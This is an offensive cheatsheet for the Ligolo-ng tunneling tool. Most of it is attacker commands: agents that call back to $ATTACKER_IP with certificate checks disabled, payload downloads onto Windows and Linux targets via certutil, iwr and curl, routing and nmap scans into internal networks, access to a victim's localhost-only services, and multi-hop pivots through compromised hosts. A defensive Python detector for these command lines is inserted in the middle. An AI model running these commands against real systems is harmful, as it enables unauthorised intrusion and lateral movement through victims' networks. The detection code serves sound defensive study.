
Ligolo-ng cheatsheet

Basic setup

Attacker - start Ligolo proxy
sudo ./lig-proxy -selfcert -laddr 0.0.0.0:443
Target - run agent
# Linux
./lig-agent -connect $ATTACKER_IP:443 -ignore-cert

# Windows
.\lig-agent.exe -connect $ATTACKER_IP:443 -ignore-cert
Transfer agent quickly (Windows target)
# From attacker
python3 -m http.server 8000

# From target
mkdir C:\temp

curl -o C:\temp\lig-agent.exe http://$ATTACKER_IP:8000/lig-agent.exe

iwr -uri http://$ATTACKER_IP:8000/lig-agent.exe -Outfile C:\temp\lig-agent.exe

certutil -urlcache -f http://$ATTACKER_IP:8000/lig-agent.exe C:\temp\lig-agent.exe
Transfer agent quickly (Linux target)
# From attacker
python3 -m http.server 8000

# From target
curl -s -o /tmp/lig-agent http://$ATTACKER_IP:8000/lig-agent
chmod +x /tmp/lig-agent
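
Defender-side view of the commands above, as an added example that is not part of the original cheatsheet or the Ligolo-ng project: a Python check over process command lines that keys on the agent's `-connect host:port` plus `-ignore-cert` flag pair rather than the binary name, and on the `certutil` and plain-HTTP `.exe` downloads. The rule names, the sample lines and the acceptance of `--flag` and `-flag=value` spellings (as Go's standard flag parser allows) are assumptions.

```python
import re

# Agent rule: match on flags, not the binary name, because the agent is
# trivially renamed (this page itself calls it "lig-agent").
HOSTPORT = re.compile(r"^[^\s:/]+:\d{1,5}$")
# Download rules: the transfer commands from the steps above.
CERTUTIL = re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)
HTTP_TO_EXE = re.compile(r"\b(curl|iwr|invoke-webrequest)(\.exe)?\b.*\bhttp://\S+.*\.exe\b", re.I)

def agent_flags(cmdline):
    """Return the -connect target if -ignore-cert is also set, else None."""
    tokens = cmdline.split()
    target, ignore_cert = None, False
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        name, _, value = tok.lstrip("-").partition("=")
        if name.lower() == "connect":
            # Accept both "-connect host:port" and "-connect=host:port".
            target = value or (tokens[i + 1] if i + 1 < len(tokens) else "")
        elif name.lower() == "ignore-cert":
            ignore_cert = True
    target = (target or "").strip("\"'")
    return target if ignore_cert and HOSTPORT.match(target) else None

def classify(cmdline):
    """Return the sorted rule names that match one process command line."""
    hits = []
    if agent_flags(cmdline):
        hits.append("agent-connect-ignore-cert")
    if CERTUTIL.search(cmdline):
        hits.append("certutil-urlcache-download")
    if HTTP_TO_EXE.search(cmdline):
        hits.append("http-download-exe")
    return sorted(hits)

# Constructed process-creation command lines (not real telemetry).
SAMPLES = [
    r".\svc-update.exe -connect 203.0.113.7:443 -ignore-cert",
    "/tmp/.cache --connect=203.0.113.7:443 --ignore-cert",
    "openssl s_client -connect example.com:443",  # benign: no -ignore-cert
    r"certutil -urlcache -f http://203.0.113.7:8000/a.exe C:\temp\a.exe",
    r"curl -o C:\temp\a.exe http://203.0.113.7:8000/a.exe",
    "curl -s https://example.com/index.html",  # benign: HTTPS, no .exe
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["-"], line)
```

Requiring both flags keeps `openssl s_client -connect` and similar tools out of the results; feed it the command-line field from process-creation telemetry.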

Tunneling

Ligolo proxy console
# manually create & start tunnel
session
ifcreate --name pivot1
interface_add_route --name pivot1 --route 10.10.10.0/24
tunnel_start --tun pivot1

# or use the autoroute feature on the selected session
session
autoroute
Scan through tunnel
nmap -sT -Pn 10.10.10.0/24

Access target localhost services (route 240)

Use this when services are only bound to 127.0.0.1 on the compromised host.

Ligolo proxy console - add localhost route
session
ifcreate --name loop
interface_add_route --name loop --route 240.0.0.1/32
tunnel_start --tun loop

Now, from the attacker machine, connect to the remote host's localhost services via 240.0.0.1:

Examples via 240.0.0.1/32
# Web app on victim localhost:3000
curl http://240.0.0.1:3000

# MongoDB on victim localhost:27017
mongosh 240.0.0.1:27017

# MySQL/MariaDB on victim localhost:3306
mysql -h 240.0.0.1 -u root -p

Multi pivot

When you need to reach more than one network, add a listener that binds a port on an already compromised host and forwards it to the attacker's Ligolo proxy port. The agent on the second victim host can then join the attacker's Ligolo proxy through that listener.

Scenario example
X - attacker - Ligolo proxy running on 192.168.10.5:443
A - victim_A - First host compromised - Can access DMZ & routeA
B - victim_B - Second host compromised - Can access routeA & routeB
Ligolo proxy console - listener
# Bind victim_A:443 to our attacker's ligolo proxy
listener_add --addr $victim_A:443 --to 192.168.10.5:443 --tcp
Join attacker ligolo proxy from victim_B
# Now that our listener is up, we can launch the ligolo agent on the victim_B compromised host.
lig-agent -connect $victim_A:443 -ignore-cert &

Tips

Some proxy commands have simpler aliases:

  • ifcreate <-> interface_create
  • interface_add_route --name X --route Y <-> route_add --name X --route Y